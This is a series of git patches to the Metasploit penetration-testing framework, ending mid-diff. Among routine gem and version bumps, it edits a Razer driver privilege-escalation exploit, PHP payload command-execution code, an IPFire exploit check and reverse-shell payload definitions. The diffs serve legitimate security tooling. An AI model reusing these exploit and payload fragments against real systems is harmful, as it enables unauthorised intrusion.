--- a/modules/exploits/windows/local/razer_zwopenprocess.rb +++ b/modules/exploits/windows/local/razer_zwopenprocess.rb @@ -70,15 +70,22 @@ class MetasploitModule < Msf::Exploit::Remote end def check - pid = session.sys.process['RazerIngameEngine.exe'] - session.sys.process.kill(pid) unless pid.nil? + # Validate that the driver has been loaded and that + # the version is the same as the one expected + client.sys.config.getdrivers.each do |d| + if d[:basename].downcase == 'rzpnk.sys' + expected_checksum = 'b4598c05d5440250633e25933fff42b0' + target_checksum = client.fs.file.md5(d[:filename]) - pid = session.sys.process['winlogon.exe'] - handle = get_handle(pid) - return Exploit::CheckCode::Safe if handle.nil? + if expected_checksum == Rex::Text.to_hex(target_checksum, '') + return Exploit::CheckCode::Appears + else + return Exploit::CheckCode::Detected + end + end + end - session.railgun.kernel32.CloseHandle(handle) - Exploit::CheckCode::Vulnerable + Exploit::CheckCode::Safe end def exploit @@ -90,14 +97,14 @@ class MetasploitModule < Msf::Exploit::Remote fail_with(Failure::NotVulnerable, 'Exploit not available on this system.') end - if sysinfo['Architecture'] =~ /wow64/i - fail_with(Failure::NoTarget, 'Running against WOW64 is not supported') - elsif sysinfo['Architecture'] == ARCH_X86 - fail_with(Failure::NoTarget, 'Session host is x86, but only x64 targets are supported') + if session.platform != 'windows' + fail_with(Failure::NoTarget, 'This exploit requires a native Windows meterpreter session') + elsif session.arch != ARCH_X64 + fail_with(Failure::NoTarget, 'This exploit only supports x64 Windows targets') end pid = session.sys.process['RazerIngameEngine.exe'] - unless pid.nil? + if pid # if this process is running, the IOCTL won't work but the process runs # with user privileges so we can kill it print_status("Found RazerIngameEngine.exe pid: #{pid}, killing it...") From 62615298e14a1bca11edb62abf17e924508a7e1e Mon Sep 17 00:00:00 2001 From: jvoisin Date: Sun, 16 Jul 2017 15:20:30 +0200 Subject: [PATCH 29/63] Fix a php warning This should close #8670 --- lib/msf/core/payload/php.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/payload/php.rb b/lib/msf/core/payload/php.rb index 7c26b2c721..bf5190cde9 100644 --- a/lib/msf/core/payload/php.rb +++ b/lib/msf/core/payload/php.rb @@ -103,7 +103,7 @@ module Msf::Payload::Php }else" proc_open = " if(#{is_callable}('proc_open')and!#{in_array}('proc_open',#{dis})){ - $handle=proc_open(#{cmd},array(array(pipe,'r'),array(pipe,'w'),array(pipe,'w')),$pipes); + $handle=proc_open(#{cmd},array(array('pipe','r'),array('pipe','w'),array('pipe','w')),$pipes); #{output}=NULL; while(!feof($pipes[1])){ #{output}.=fread($pipes[1],1024); From 7d6992c0e80cbc93e85452ea4432ab05078d32db Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Mon, 17 Jul 2017 09:58:20 +0200 Subject: [PATCH 30/63] respect windows --- lib/msf/util.rb | 1 + lib/msf/util/helper.rb | 19 +++++++++++++++++++ metasploit-framework.gemspec | 3 +-- 3 files changed, 21 insertions(+), 2 deletions(-) create mode 100644 lib/msf/util/helper.rb diff --git a/lib/msf/util.rb b/lib/msf/util.rb index 7439f57d30..4944e330e9 100644 --- a/lib/msf/util.rb +++ b/lib/msf/util.rb @@ -21,3 +21,4 @@ end # Executable generation and encoding require 'msf/util/exe' +require 'msf/util/helper' diff --git a/lib/msf/util/helper.rb b/lib/msf/util/helper.rb new file mode 100644 index 0000000000..b5823db870 --- /dev/null +++ b/lib/msf/util/helper.rb @@ -0,0 +1,19 @@ +# -*- coding: binary -*- + +module Msf +module Util +class Helper + # Cross-platform way of finding an executable in the $PATH. + # + # which('ruby') #=> /usr/bin/ruby + def self.which(cmd) + exts = ENV['PATHEXT'] ? ENV['PATHEXT'].split(';') : [''] + ENV['PATH'].split(File::PATH_SEPARATOR).each do |path| + exts.each { |ext| + exe = File.join(path, "#{cmd}#{ext}") + return exe if File.executable?(exe) && !File.directory?(exe) + } + end + return nil + end +end diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index cb1e8596af..0eb56d5ff5 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -25,8 +25,7 @@ Gem::Specification.new do |spec| spec.license = 'BSD-3-clause' # only do a git ls-files if the .git folder exists and we have a git binary in PATH - if File.directory?(File.join(File.dirname(__FILE__), ".git")) && - ENV['PATH'].split(':').collect {|d| Dir.entries d if Dir.exists? d}.flatten.include?("git") + if File.directory?(File.join(File.dirname(__FILE__), ".git")) && Msf::Util::Helper.which("git") spec.files = `git ls-files`.split($/).reject { |file| file =~ /^documentation|^external/ } From 3c7d6c3a6a25e35eab3c4641e83a4f5ecb0daf7d Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Mon, 17 Jul 2017 10:10:12 +0200 Subject: [PATCH 31/63] fixed some bugs --- lib/msf/util/helper.rb | 2 ++ metasploit-framework.gemspec | 1 + 2 files changed, 3 insertions(+) diff --git a/lib/msf/util/helper.rb b/lib/msf/util/helper.rb index b5823db870..82b72c9491 100644 --- a/lib/msf/util/helper.rb +++ b/lib/msf/util/helper.rb @@ -17,3 +17,5 @@ class Helper return nil end end +end +end diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 0eb56d5ff5..1e71b756d9 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -13,6 +13,7 @@ end $LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib) require 'metasploit/framework/version' require 'metasploit/framework/rails_version_constraint' +require 'msf/util/helper' Gem::Specification.new do |spec| spec.name = 'metasploit-framework' From ea025583902eef0a58e6510ad9502a16b1a58822 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Mon, 17 Jul 2017 09:26:14 -0500 Subject: [PATCH 32/63] bump prerelease gems to fix specific issues with Framework rb-readline has an issue with the latest curses release dnsruby changes the global thread behavior to abort on exception --- Gemfile | 6 ++++++ Gemfile.lock | 16 ++++++++++++++-- 2 files changed, 20 insertions(+), 2 deletions(-) diff --git a/Gemfile b/Gemfile index 4dbdbacb6d..26b82335ed 100755 --- a/Gemfile +++ b/Gemfile @@ -3,6 +3,12 @@ source 'https://rubygems.org' # spec.add_runtime_dependency '', [] gemspec name: 'metasploit-framework' +# These pull in pre-release gems in order to fix specific issues. +# XXX https://github.com/alexdalitz/dnsruby/pull/134 +gem 'dnsruby', git: 'https://github.com/alexdalitz/dnsruby' +# XXX https://github.com/ConnorAtherton/rb-readline/commit/fd882edcd145c26681f9971be5f6675c7f6d1970 +gem 'rb-readline', git: 'https://github.com/ConnorAtherton/rb-readline' + # separate from test as simplecov is not run on travis-ci group :coverage do # code coverage for tests diff --git a/Gemfile.lock b/Gemfile.lock index 68976ee3b4..aa6a6fe5ef 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,3 +1,15 @@ +GIT + remote: https://github.com/ConnorAtherton/rb-readline + revision: fd882edcd145c26681f9971be5f6675c7f6d1970 + specs: + rb-readline (0.5.4) + +GIT + remote: https://github.com/alexdalitz/dnsruby + revision: 09c3890ccfaedb7fd4951f56575d5c53651e0140 + specs: + dnsruby (1.60.1) + PATH remote: . specs: @@ -109,7 +121,6 @@ GEM builder (3.2.3) coderay (1.1.1) diff-lcs (1.3) - dnsruby (1.60.1) docile (1.1.5) erubis (2.7.0) factory_girl (4.8.0) @@ -234,7 +245,6 @@ GEM rake (>= 0.8.7) thor (>= 0.18.1, < 2.0) rake (12.0.0) - rb-readline (0.5.4) recog (2.1.11) nokogiri redcarpet (3.4.0) @@ -350,6 +360,7 @@ PLATFORMS ruby DEPENDENCIES + dnsruby! factory_girl_rails fivemat metasploit-aggregator @@ -357,6 +368,7 @@ DEPENDENCIES octokit pry rake + rb-readline! redcarpet rspec-rails rspec-rerun From 3a8f7cbabefaaf571324b2d9413c67ae4f8a9716 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Mon, 17 Jul 2017 09:41:47 -0500 Subject: [PATCH 33/63] git is really needed in docker too --- docker/Dockerfile | 1 + 1 file changed, 1 insertion(+) diff --git a/docker/Dockerfile b/docker/Dockerfile index 52eb6cadfd..e271fc8589 100644 --- a/docker/Dockerfile +++ b/docker/Dockerfile @@ -35,6 +35,7 @@ RUN apk update && \ yaml-dev \ zlib-dev \ ncurses-dev \ + git \ && echo "gem: --no-ri --no-rdoc" > /etc/gemrc \ && bundle install --system $BUNDLER_ARGS \ && apk del .ruby-builddeps \ From d77e9acec055909d656228e340771b6ca24c86e3 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Mon, 17 Jul 2017 09:56:18 -0500 Subject: [PATCH 34/63] libffi is no longer needed --- docker/Dockerfile | 1 - 1 file changed, 1 deletion(-) diff --git a/docker/Dockerfile b/docker/Dockerfile index e271fc8589..d6e56029c8 100644 --- a/docker/Dockerfile +++ b/docker/Dockerfile @@ -24,7 +24,6 @@ RUN apk update && \ bison \ build-base \ ruby-dev \ - libffi-dev\ openssl-dev \ readline-dev \ sqlite-dev \ From f80c0531147d05f24c5071868efe880c89dfa517 Mon Sep 17 00:00:00 2001 From: Metasploit Date: Mon, 17 Jul 2017 12:01:22 -0700 Subject: [PATCH 35/63] Bump version of framework to 4.15.2 --- Gemfile.lock | 6 +++--- lib/metasploit/framework/version.rb | 2 +- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index aa6a6fe5ef..037a6ff9f1 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -13,7 +13,7 @@ GIT PATH remote: . specs: - metasploit-framework (4.15.1) + metasploit-framework (4.15.2) actionpack (~> 4.2.6) activerecord (~> 4.2.6) activesupport (~> 4.2.6) @@ -274,7 +274,7 @@ GEM rex-arch rex-ole (0.1.6) rex-text - rex-powershell (0.1.72) + rex-powershell (0.1.73) rex-random_identifier rex-text rex-random_identifier (0.1.2) @@ -377,4 +377,4 @@ DEPENDENCIES yard BUNDLED WITH - 1.15.1 + 1.15.2 diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index ad726fc009..6321a6f85e 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.15.1" + VERSION = "4.15.2" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash From ecce28e8b9106f98203cfbf1b675d7563081e4ee Mon Sep 17 00:00:00 2001 From: David Maloney Date: Mon, 17 Jul 2017 15:04:43 -0500 Subject: [PATCH 36/63] revert rex-powershell back to previous version some things need to be worked out in framework before this gem version is ready for release --- Gemfile.lock | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Gemfile.lock b/Gemfile.lock index 037a6ff9f1..50c131934e 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -274,7 +274,7 @@ GEM rex-arch rex-ole (0.1.6) rex-text - rex-powershell (0.1.73) + rex-powershell (0.1.72) rex-random_identifier rex-text rex-random_identifier (0.1.2) From 43e04c889483a911b11d0f60763a1511af417a51 Mon Sep 17 00:00:00 2001 From: Jon Hart Date: Mon, 17 Jul 2017 13:14:47 -0700 Subject: [PATCH 37/63] Improve RDP probe packet --- modules/auxiliary/scanner/rdp/rdp_scanner.rb | 41 +++++++++++++++++--- 1 file changed, 35 insertions(+), 6 deletions(-) diff --git a/modules/auxiliary/scanner/rdp/rdp_scanner.rb b/modules/auxiliary/scanner/rdp/rdp_scanner.rb index a5a7637826..50c4cb8c01 100644 --- a/modules/auxiliary/scanner/rdp/rdp_scanner.rb +++ b/modules/auxiliary/scanner/rdp/rdp_scanner.rb @@ -20,6 +20,7 @@ class MetasploitModule < Msf::Auxiliary 'Author' => 'Jon Hart ', 'References' => [ + ['URL', 'https://msdn.microsoft.com/en-us/library/cc240445.aspx'] ], 'License' => MSF_LICENSE ) @@ -27,18 +28,18 @@ class MetasploitModule < Msf::Auxiliary register_options( [ - Opt::RPORT(3389) - # XXX: add options to turn on/off TLS, CredSSP, early user, cookies, etc. + Opt::RPORT(3389), + OptBool.new('TLS', [true, 'Wheter or not request TLS security', true]), + OptBool.new('CredSSP', [true, 'Whether or not to request CredSSP', true]), + OptBool.new('EarlyUser', [true, 'Whether to support Earlier User Authorization Result PDU', false]) ] ) end - # simple TPKT v3 + x.224 COTP Connect Request + RDP negotiation request with TLS and CredSSP requested - RDP_PROBE = "\x03\x00\x00\x13\x0e\xe0\x00\x00\x00\x00\x00\x01\x00\x08\x00\x03\x00\x00\x00" # any TPKT v3 + x.2224 COTP Connect Confirm - RDP_RE = /^\x03\x00.{3}\xd0.{7}.*$/ + RDP_RE = /^\x03\x00.{3}\xd0.{5}.*$/ def rdp? - sock.put(RDP_PROBE) + sock.put(@probe) response = sock.get_once(-1) if response if RDP_RE.match?(response) @@ -53,6 +54,34 @@ class MetasploitModule < Msf::Auxiliary end end + def setup + # build a simple TPKT v3 + x.224 COTP Connect Request. optionally append + # RDP negotiation request with TLS, CredSSP and Early User as requesteste + requestedProtocols = 0 + if datastore['TLS'] + requestedProtocols = requestedProtocols ^ 0b1 + end + if datastore['CredSSP'] + requestedProtocols = requestedProtocols ^ 0b10 + end + if datastore['EarlyUser'] + requestedProtocols = requestedProtocols ^ 0b1000 + end + + if requestedProtocols == 0 + tpkt_len = 11 + cotp_len = 6 + pack = [ 3, 0, tpkt_len, cotp_len, 0xe0, 0, 0, 0 ] + pack_string = "CCnCCnnC" + else + tpkt_len = 19 + cotp_len = 14 + pack = [ 3, 0, tpkt_len, cotp_len, 0xe0, 0, 0, 0, 1, 0, 8, 0, requestedProtocols ] + pack_string = "CCnCCnnCCCCCV" + end + @probe = pack.pack(pack_string) + end + def run_host(_ip) begin connect From 3ad4ff69b45cc2dee90acaa6aba7864b759ee4c6 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Mon, 17 Jul 2017 15:25:26 -0500 Subject: [PATCH 38/63] try and hard lock rex-powershell version remove this later when the issues with this gem release are addressed --- Gemfile.lock | 2 +- metasploit-framework.gemspec | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 50c131934e..13b5f12be9 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -58,7 +58,7 @@ PATH rex-mime rex-nop rex-ole - rex-powershell + rex-powershell (< 0.1.73) rex-random_identifier rex-registry rex-rop_builder diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 1e71b756d9..f4e586e798 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -136,7 +136,7 @@ Gem::Specification.new do |spec| # Library for Generating Randomized strings valid as Identifiers such as variable names spec.add_runtime_dependency 'rex-random_identifier' # library for creating Powershell scripts for exploitation purposes - spec.add_runtime_dependency 'rex-powershell' + spec.add_runtime_dependency 'rex-powershell', ["< 0.1.73"] # Library for processing and creating Zip compatbile archives spec.add_runtime_dependency 'rex-zip' # Library for parsing offline Windows Registry files From e5ef737c21ef00d801e3b76392760062b54f4c63 Mon Sep 17 00:00:00 2001 From: Jon Hart Date: Mon, 17 Jul 2017 13:45:12 -0700 Subject: [PATCH 39/63] Add documentation --- .../auxiliary/scanner/rdp/rdp_scanner.md | 66 +++++++++++++++++++ 1 file changed, 66 insertions(+) create mode 100644 documentation/modules/auxiliary/scanner/rdp/rdp_scanner.md diff --git a/documentation/modules/auxiliary/scanner/rdp/rdp_scanner.md b/documentation/modules/auxiliary/scanner/rdp/rdp_scanner.md new file mode 100644 index 0000000000..068377810b --- /dev/null +++ b/documentation/modules/auxiliary/scanner/rdp/rdp_scanner.md @@ -0,0 +1,66 @@ +## Vulnerable Application + + Any system exposing the remote desktop protocol, RDP, typically on 3389/TCP. + +## Verification Steps + + 1. Do: ```use auxiliary/scanner/rdp/rdp_scanner``` + 2. Do: ```set [RHOSTS]```, replacing ```[RHOSTS]``` with a list of hosts to test for the presence of RDP + 3. Do: ```run``` + 4. If the host is exposing an identifiable RDP instance, it will print the endpoint. + +## Options + + There are three options currently supported that control what security protocols to + send in the RDP negotiation request, which can be helpful in identifying RDP + endpoints that might be locked down or configured differently: + + **TLS** Set to true to request TLS security support + **CredSSP** Set to true to request CredSSP support + **EarlyUser** Set to true to request Early User Authorization Result PDU support + +## Scenarios + + ``` +msf auxiliary(rdp_scanner) > run + +[+] 10.4.18.26:3389 - Identified RDP +[+] 10.4.18.22:3389 - Identified RDP +[+] 10.4.18.89:3389 - Identified RDP +[+] 10.4.18.9:3389 - Identified RDP +[+] 10.4.18.67:3389 - Identified RDP +[+] 10.4.18.80:3389 - Identified RDP +[+] 10.4.18.34:3389 - Identified RDP +[+] 10.4.18.70:3389 - Identified RDP +[+] 10.4.18.30:3389 - Identified RDP +[+] 10.4.18.76:3389 - Identified RDP +[+] 10.4.18.13:3389 - Identified RDP +[+] 10.4.18.91:3389 - Identified RDP +[+] 10.4.18.5:3389 - Identified RDP +[+] 10.4.18.47:3389 - Identified RDP +[+] 10.4.18.41:3389 - Identified RDP +[+] 10.4.18.105:3389 - Identified RDP +[*] Scanned 44 of 256 hosts (17% complete) +[*] Scanned 55 of 256 hosts (21% complete) +[+] 10.4.18.118:3389 - Identified RDP +[+] 10.4.18.108:3389 - Identified RDP +[+] 10.4.18.139:3389 - Identified RDP +[*] Scanned 94 of 256 hosts (36% complete) +[*] Scanned 110 of 256 hosts (42% complete) +[+] 10.4.18.157:3389 - Identified RDP +[+] 10.4.18.166:3389 - Identified RDP +[+] 10.4.18.164:3389 - Identified RDP +[+] 10.4.18.170:3389 - Identified RDP +[+] 10.4.18.185:3389 - Identified RDP +[+] 10.4.18.209:3389 - Identified RDP +[+] 10.4.18.188:3389 - Identified RDP +[*] Scanned 156 of 256 hosts (60% complete) +[+] 10.4.18.237:3389 - Identified RDP +[+] 10.4.18.225:3389 - Identified RDP +[*] Scanned 186 of 256 hosts (72% complete) +[*] Scanned 194 of 256 hosts (75% complete) +[*] Scanned 208 of 256 hosts (81% complete) +[*] Scanned 253 of 256 hosts (98% complete) +[*] Scanned 256 of 256 hosts (100% complete) +[*] Auxiliary module execution completed +``` From ba92d42b5763ce3ba9c7eea6fe5f2b9447845e40 Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Mon, 17 Jul 2017 15:52:50 -0500 Subject: [PATCH 40/63] Updated version check per @bcoles --- modules/exploits/linux/http/ipfire_oinkcode_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/ipfire_oinkcode_exec.rb b/modules/exploits/linux/http/ipfire_oinkcode_exec.rb index 7dad137ea5..d4238b6c0b 100644 --- a/modules/exploits/linux/http/ipfire_oinkcode_exec.rb +++ b/modules/exploits/linux/http/ipfire_oinkcode_exec.rb @@ -72,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote end # now that we've pulled the info we need, check version. - if version && update && version.eql == '2.19' && update.to_i <= 110 + if version && update && version == '2.19' && update.to_i <= 110 CheckCode::Appears else CheckCode::Safe From 39b2e824ec14cb2f63450493babfc83c975e38dd Mon Sep 17 00:00:00 2001 From: Metasploit Date: Mon, 17 Jul 2017 15:43:31 -0700 Subject: [PATCH 41/63] Bump version of framework to 4.15.3 --- Gemfile.lock | 2 +- lib/metasploit/framework/version.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 13b5f12be9..b0ad333b5b 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -13,7 +13,7 @@ GIT PATH remote: . specs: - metasploit-framework (4.15.2) + metasploit-framework (4.15.3) actionpack (~> 4.2.6) activerecord (~> 4.2.6) activesupport (~> 4.2.6) diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index 6321a6f85e..712ec5a517 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.15.2" + VERSION = "4.15.3" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash From cc3168933f313c0d84ccf15466ddd4b5157042ea Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Tue, 18 Jul 2017 13:13:38 -0500 Subject: [PATCH 42/63] update mettle payloads, template generator --- Gemfile.lock | 4 +- metasploit-framework.gemspec | 2 +- .../linux/aarch64/meterpreter_reverse_http.rb | 2 +- .../aarch64/meterpreter_reverse_https.rb | 2 +- .../linux/aarch64/meterpreter_reverse_tcp.rb | 2 +- .../linux/armbe/meterpreter_reverse_http.rb | 2 +- .../linux/armbe/meterpreter_reverse_https.rb | 2 +- .../linux/armbe/meterpreter_reverse_tcp.rb | 2 +- .../linux/armle/meterpreter_reverse_http.rb | 2 +- .../linux/armle/meterpreter_reverse_https.rb | 2 +- .../linux/armle/meterpreter_reverse_tcp.rb | 2 +- .../linux/mips64/meterpreter_reverse_http.rb | 2 +- .../linux/mips64/meterpreter_reverse_https.rb | 2 +- .../linux/mips64/meterpreter_reverse_tcp.rb | 2 +- .../linux/mipsbe/meterpreter_reverse_http.rb | 2 +- .../linux/mipsbe/meterpreter_reverse_https.rb | 2 +- .../linux/mipsbe/meterpreter_reverse_tcp.rb | 2 +- .../linux/mipsle/meterpreter_reverse_http.rb | 2 +- .../linux/mipsle/meterpreter_reverse_https.rb | 2 +- .../linux/mipsle/meterpreter_reverse_tcp.rb | 2 +- .../linux/ppc/meterpreter_reverse_http.rb | 2 +- .../linux/ppc/meterpreter_reverse_https.rb | 2 +- .../linux/ppc/meterpreter_reverse_tcp.rb | 2 +- .../linux/ppc64le/meterpreter_reverse_http.rb | 2 +- .../ppc64le/meterpreter_reverse_https.rb | 2 +- .../linux/ppc64le/meterpreter_reverse_tcp.rb | 2 +- .../linux/x64/meterpreter_reverse_http.rb | 2 +- .../linux/x64/meterpreter_reverse_https.rb | 2 +- .../linux/x64/meterpreter_reverse_tcp.rb | 2 +- .../linux/x86/meterpreter_reverse_http.rb | 2 +- .../linux/x86/meterpreter_reverse_https.rb | 2 +- .../linux/x86/meterpreter_reverse_tcp.rb | 2 +- .../linux/zarch/meterpreter_reverse_http.rb | 2 +- .../linux/zarch/meterpreter_reverse_https.rb | 2 +- .../linux/zarch/meterpreter_reverse_tcp.rb | 2 +- .../meterpreter_reverse_http.rb} | 21 +++++---- .../osx/x64/meterpreter_reverse_https.rb | 45 +++++++++++++++++++ .../osx/x64/meterpreter_reverse_tcp.rb | 7 ++- tools/modules/generate_mettle_payloads.rb | 36 ++++++++------- ...er_reverse.erb => meterpreter_reverse.erb} | 16 ++++--- 40 files changed, 130 insertions(+), 67 deletions(-) rename modules/payloads/singles/osx/{x86/meterpreter_reverse_tcp.rb => x64/meterpreter_reverse_http.rb} (61%) create mode 100644 modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb rename tools/modules/{linux_meterpreter_reverse.erb => meterpreter_reverse.erb} (72%) diff --git a/Gemfile.lock b/Gemfile.lock index 13b5f12be9..d19609ffa3 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -30,7 +30,7 @@ PATH metasploit-model metasploit-payloads (= 1.2.37) metasploit_data_models - metasploit_payloads-mettle (= 0.1.10) + metasploit_payloads-mettle (= 0.1.13) msgpack nessus_rest net-ssh @@ -189,7 +189,7 @@ GEM postgres_ext railties (~> 4.2.6) recog (~> 2.0) - metasploit_payloads-mettle (0.1.10) + metasploit_payloads-mettle (0.1.13) method_source (0.8.2) mini_portile2 (2.2.0) minitest (5.10.2) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index f4e586e798..4b6614e1b3 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -72,7 +72,7 @@ Gem::Specification.new do |spec| # Needed for Meterpreter spec.add_runtime_dependency 'metasploit-payloads', '1.2.37' # Needed for the next-generation POSIX Meterpreter - spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.10' + spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.13' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # get list of network interfaces, like eth* from OS. diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb index fe533ba2e2..17b86565e0 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux' module MetasploitModule - CachedSize = 652264 + CachedSize = 675048 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb index b7ec5eaf23..9122765380 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux' module MetasploitModule - CachedSize = 652264 + CachedSize = 675048 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb index 8f52504dbb..f407e0daf0 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux' module MetasploitModule - CachedSize = 652264 + CachedSize = 675048 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb index efd415b4f8..6c876d1bee 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux' module MetasploitModule - CachedSize = 645136 + CachedSize = 668360 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb index 8f1e1ee119..b77e2f7c23 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux' module MetasploitModule - CachedSize = 645136 + CachedSize = 668360 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb index ff65f14f9e..3bd0c0e77d 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux' module MetasploitModule - CachedSize = 645136 + CachedSize = 668360 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb index 54bd7d06c7..e643614ecf 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux' module MetasploitModule - CachedSize = 643904 + CachedSize = 666624 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb index c8c58653c9..0c07ad94cf 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux' module MetasploitModule - CachedSize = 643904 + CachedSize = 666624 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb index a156cecc4b..51db411ca4 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux' module MetasploitModule - CachedSize = 643904 + CachedSize = 666624 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb index 1316f50c33..a09f014fde 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux' module MetasploitModule - CachedSize = 1028600 + CachedSize = 1059232 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb index ee2989048a..5abfa80bc9 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux' module 